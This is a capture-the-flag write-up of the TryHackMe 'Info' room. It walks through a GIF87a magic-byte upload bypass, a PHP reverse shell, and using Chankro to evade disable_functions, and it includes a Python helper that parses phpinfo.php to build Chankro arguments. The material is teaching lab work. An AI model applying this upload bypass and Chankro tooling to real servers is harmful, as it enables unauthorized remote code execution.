This is the Info room on TryHackMe.
Let’s begin.
The room has two sections.
The first section is an introduction with some description of PHP functions and of a tool named Chankro.
The installation process is also described there. It’s super simple: just git clone and run.
After reading that section, let’s move on to the next section to get the flag.
With the given IP, we see a site like this…
If we go through all the links, they redirect to the same page,
except for the Apply Job link.
If we click on this link we get redirected to a page where we can upload something.
And this is the place we are actually looking for 😛
Let’s try to upload a PHP file.
I’m using the simple PHP reverse shell from the
/usr/share/webshells/php directory.
You can also find this on your Kali machine.
But the site isn’t accepting the PHP file. It says to upload a real image.
So let’s capture the request with Burp Suite.
First capture the request of uploading an image file and send it to Repeater.
The accepted file types are marked in the image above.
Again, capture the request of uploading a PHP file.
P.S.: I’ve renamed php-reverse-shell.php to kid.php.
After sending it to Repeater I tried replacing application/x-php with image/jpeg and changing the extension to kid.php.jpg,
but it gives the same error.
I tried other extensions too, and GIF was the one that worked.
Let’s try with the magic bytes of a GIF file.
Add GIF87a at the beginning, before <?php [as in the image below],
and see whether we can bypass the check.
It’s OK. That means we are able to upload it: the server only inspects the leading bytes to decide whether the file is an image, and PHP treats anything before the first <?php tag as plain output, so the code after it still runs.
[P.S.: I’ve renamed the PHP reverse shell to boss.php]
Now we have to find where the uploaded file is located.
Let’s do it with gobuster.
It is uploaded to http://<IP>/uploads
We also got the location of a PHP configuration page, phpinfo.php.
The next task is to start a Netcat listener and execute the PHP file we uploaded, but the connection is refused: the PHP functions the reverse shell relies on are filtered on the server, which is exactly what Chankro is built to get around.
So we have to know the exact filesystem path of the upload directory to get the reverse shell back.
Let’s read the phpinfo.php page.
There we should find the location.
This is the location:
And to bypass the filter we have to use the Chankro tool.
Before that we have to make a bash file. Here is the bash file I’m using to get a reverse shell.
Edit the IP to yours and the port to your choice.
Then we are good to go with the Chankro tool.
Let’s break down the command for understanding:
— arch = architecture of the victim system, 32 or 64. Here it’s 64.
— input = file with your payload to execute. Here it’s c.sh.
— output = name of the PHP file you are going to create; this is the file you will need to upload. Here I gave it the name boss.php.
— path = the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder, DOCUMENTROOT + uploads. We got the location from phpinfo.php, which is /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db
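Reading the path and the filtering off phpinfo.php, and turning them into the four flags above, as an added example (not code from the write-up or from Chankro): the parser below takes phpinfo’s two-column HTML table and extracts the document root, the disable_functions list and the machine architecture, checks that putenv() and mail(), which Chankro’s LD_PRELOAD technique relies on as I understand the tool, are not disabled, and assembles the flag list. SAMPLE_PHPINFO is a constructed excerpt in phpinfo’s layout with /var/www/html as document root; on the target you substitute the values its own page reports.

```python
"""Added example, not code from the original write-up or from Chankro.

Pulls the values the post reads off phpinfo.php (document root, disabled
functions, architecture) out of phpinfo's two-column HTML table and turns
them into the Chankro flags explained above. SAMPLE_PHPINFO is a constructed
excerpt in phpinfo's table layout; the target's real page will differ.
"""
import os
import re

SAMPLE_PHPINFO = """
<tr><td class="e">System </td><td class="v">Linux webhost 4.15.0-112-generic #1 SMP x86_64 </td></tr>
<tr><td class="e">disable_functions</td><td class="v">exec,passthru,shell_exec,system,proc_open,popen</td><td class="v">exec,passthru,shell_exec,system,proc_open,popen</td></tr>
<tr><td class="e">$_SERVER['DOCUMENT_ROOT']</td><td class="v">/var/www/html</td></tr>
<tr><td class="e">$_SERVER['SCRIPT_FILENAME']</td><td class="v">/var/www/html/phpinfo.php</td></tr>
"""

# phpinfo prints each directive / variable as an "e" cell followed by "v" cell(s).
ROW = re.compile(r'<td class="e">\s*(.*?)\s*</td>\s*<td class="v">\s*(.*?)\s*</td>', re.S)

# Chankro's LD_PRELOAD trick (as I understand the tool) is triggered through
# putenv() and mail(); if either is disabled the generated file cannot work.
CHANKRO_NEEDS = ("putenv", "mail")


def parse_phpinfo(html: str) -> dict:
    """Map each directive / $_SERVER key to its first (local) value."""
    info = {}
    for key, value in ROW.findall(html):
        key = re.sub(r"^\$_SERVER\['(.*)'\]$", r"\1", key)
        info.setdefault(key, value)
    return info


def disabled_functions(info: dict) -> set:
    """The disable_functions list; phpinfo prints 'no value' when it is empty."""
    raw = info.get("disable_functions", "")
    if raw in ("", "no value"):
        return set()
    return {f.strip() for f in raw.split(",") if f.strip()}


def detect_arch(info: dict) -> str:
    """--arch: 64 if the kernel string names a 64-bit machine, else 32."""
    tokens = info.get("System", "").split()
    return "64" if any(t in ("x86_64", "amd64", "aarch64") for t in tokens) else "32"


def chankro_prereqs(info: dict):
    """Return (ok, missing): which functions Chankro needs are disabled."""
    missing = [f for f in CHANKRO_NEEDS if f in disabled_functions(info)]
    return (not missing, missing)


def upload_path(info: dict, subdir: str = "uploads") -> str:
    """--path: DOCUMENT_ROOT + the upload folder found with gobuster."""
    return os.path.join(info["DOCUMENT_ROOT"], subdir)


def chankro_argv(info: dict, payload: str, output: str, subdir: str = "uploads") -> list:
    """Flags for chankro.py; prefix with the interpreter named in its README."""
    return ["chankro.py", "--arch", detect_arch(info), "--input", payload,
            "--output", output, "--path", upload_path(info, subdir)]
```

The prerequisite check is the caveat worth running first: if disable_functions on the target also lists putenv or mail, the generated boss.php will upload fine and still never spawn the shell, and you would otherwise be left guessing at "filtering".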
Then back to the upload page.
Turn on FoxyProxy and also interception in Burp Suite.
Select the newly created file we got from Chankro.
After capturing, send the request to Repeater.
Edit it the same way as before [GIF87a at the beginning, before <?php].
Now it’s uploaded.
Get your Netcat listener ready,
then navigate to the uploads folder.
Hold your breath and click on it.
If everything is done correctly you should get a shell in Netcat.
Then, to get the flag, let’s move to the home folder.
Let’s cd to s4vi and list it.
There is flag.txt.
So here we finish.
Let’s hope to see you again with some juicy stuff.
Until then, this is badboy_17, and I really do thank you for joining me. ♥️